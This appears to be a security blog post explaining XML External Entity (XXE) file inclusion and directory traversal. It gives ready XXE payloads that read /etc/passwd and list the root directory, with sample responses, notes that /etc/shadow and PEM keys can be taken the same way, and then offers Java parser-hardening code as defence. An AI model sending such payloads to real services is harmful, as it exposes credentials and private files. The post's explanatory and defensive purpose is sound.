XML File Inclusion and Path Traversal Attacks
Colin Wong’s paper “XML Port Scanning - Bypassing Restrictive Perimeter Firewalls” describes a way of abusing XML parsers in web services and web applications to footprint DMZ and backend services. The attack scheme is not new, though: Gregory Steuck already described it in a post in October 2002 as the XML eXternal Entity (XXE) attack.
So here are my two cents on this topic: the attack scheme is more potent than they imagine. Depending on the application, it is possible to include server-side files in XML documents. If, for example, the content of the processed XML document is stored in a database, and that database can be read through the same or another web service or web application, then the file content is disclosed.
For example, a request could look like this…
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE req [
<!ENTITY value SYSTEM "/etc/passwd">
]>
<req>
<field>&value;</field>
</req>
… and here the corresponding response:
<?xml version="1.0" encoding="UTF-8" ?>
<resp>
<field>root:x:0:0:root:/root:/bin/bash
…</field>
</resp>
So far I have not succeeded in including arbitrary XML documents, since their markup often violates the DTD of the surrounding XML. If the DTD allows further XML tags inside a field, however, extracting XML documents should also be possible. In general, my experience shows that Java property files, /etc/passwd, /etc/shadow or even PEM-encoded SSL key material pose no problems.
Because directories can often be read just like files, as is the case in Java, it is possible to traverse directories and read files without guessing paths:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE req [
<!ENTITY value SYSTEM "/">
]>
<req>
<field>&value;</field>
</req>
… and here the response to the above request:
<?xml version="1.0" encoding="UTF-8" ?>
<resp>
<field>bin
dev
etc
…
</field>
</resp>
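To make the directory trick a bit more tangible, here is a minimal sketch of what presumably happens underneath when a Java parser dereferences a system identifier that points at a directory. It assumes an OpenJDK-style runtime whose file: URL handler answers with a plain list of entry names instead of an error; this is implementation behaviour, not something the XML specification promises. The class name DirectoryAsFile, the helpers readViaFileUrl and demoListing, and the two file names are made up for illustration.

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

public class DirectoryAsFile {

    /** Reads whatever the file: URL handler returns for the given path. */
    public static String readViaFileUrl(Path path) {
        try (InputStream in = path.toUri().toURL().openStream()) {
            return new String(in.readAllBytes(), StandardCharsets.UTF_8);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    /** Creates a throwaway directory with two made-up files and reads it. */
    public static String demoListing() {
        try {
            Path dir = Files.createTempDirectory("xxe-demo");
            Files.createFile(dir.resolve("alpha.properties"));
            Files.createFile(dir.resolve("beta.pem"));
            return readViaFileUrl(dir);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        // On an OpenJDK-style runtime this prints the directory entries,
        // one name per line, rather than failing with an I/O error.
        System.out.print(demoListing());
    }
}
```

An entity pointing at a directory is resolved through the same kind of URL lookup, which is why the listing ends up inside the field of the response.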
Incidentally, XML file inclusion is a common practice among Java web application developers and system engineers, who use it on their own systems to pull external parts into web.xml and Tomcat server.xml configuration files.
The key to solving this issue is to harden the XML parser by setting restrictive entity parsing options and to implement custom entity resolvers, just as described in Colin’s paper. Additionally, I recommend running the web application under a low-privileged user account and restricting read and write access for this user across the operating system. The paranoid among us who have deployed a Java-based container should also consider restricting file and network access through Java policies and the security manager.
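As a rough sketch of the parser hardening, assuming the JAXP DOM parser that ships with the JDK: the first builder sets restrictive parsing options and refuses any DOCTYPE, the second keeps DOCTYPEs legal but installs a custom entity resolver that vetoes every external lookup. This is my own illustration and not taken from the paper. The disallow-doctype-decl feature is Xerces-specific, so other parsers may reject it, and the names HardenedXmlParser, strictBuilder, resolverBuilder and accepts are hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

public class HardenedXmlParser {

    /** Option 1: restrictive parsing options; any DOCTYPE is refused. */
    public static DocumentBuilder strictBuilder() {
        try {
            DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
            f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            // Xerces-specific feature; assumed to be supported by the parser in use.
            f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            f.setXIncludeAware(false);
            f.setExpandEntityReferences(false);
            return f.newDocumentBuilder();
        } catch (ParserConfigurationException e) {
            throw new IllegalStateException("parser cannot be hardened", e);
        }
    }

    /** Option 2: DOCTYPEs stay legal, but a custom resolver vetoes external lookups. */
    public static DocumentBuilder resolverBuilder() {
        try {
            DocumentBuilder b = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            b.setEntityResolver((publicId, systemId) -> {
                throw new SAXException("external entity blocked: " + systemId);
            });
            return b;
        } catch (ParserConfigurationException e) {
            throw new IllegalStateException("parser cannot be created", e);
        }
    }

    /** Returns true if the document parses, false if the parser rejects it. */
    public static boolean accepts(DocumentBuilder b, String xml) {
        try {
            b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (SAXException e) {
            return false;
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        String benign = "<req><field>hello</field></req>";
        String xxe = "<!DOCTYPE req [<!ENTITY value SYSTEM \"file:///etc/passwd\">]>"
                   + "<req><field>&value;</field></req>";
        System.out.println("strict, benign:   " + accepts(strictBuilder(), benign));
        System.out.println("strict, xxe:      " + accepts(strictBuilder(), xxe));
        System.out.println("resolver, benign: " + accepts(resolverBuilder(), benign));
        System.out.println("resolver, xxe:    " + accepts(resolverBuilder(), xxe));
    }
}
```

Refusing DOCTYPEs outright is the simpler option when the application never needs them. The resolver variant is for services that must accept DTDs; a real resolver would probably allow a short whitelist of known system identifiers rather than block everything.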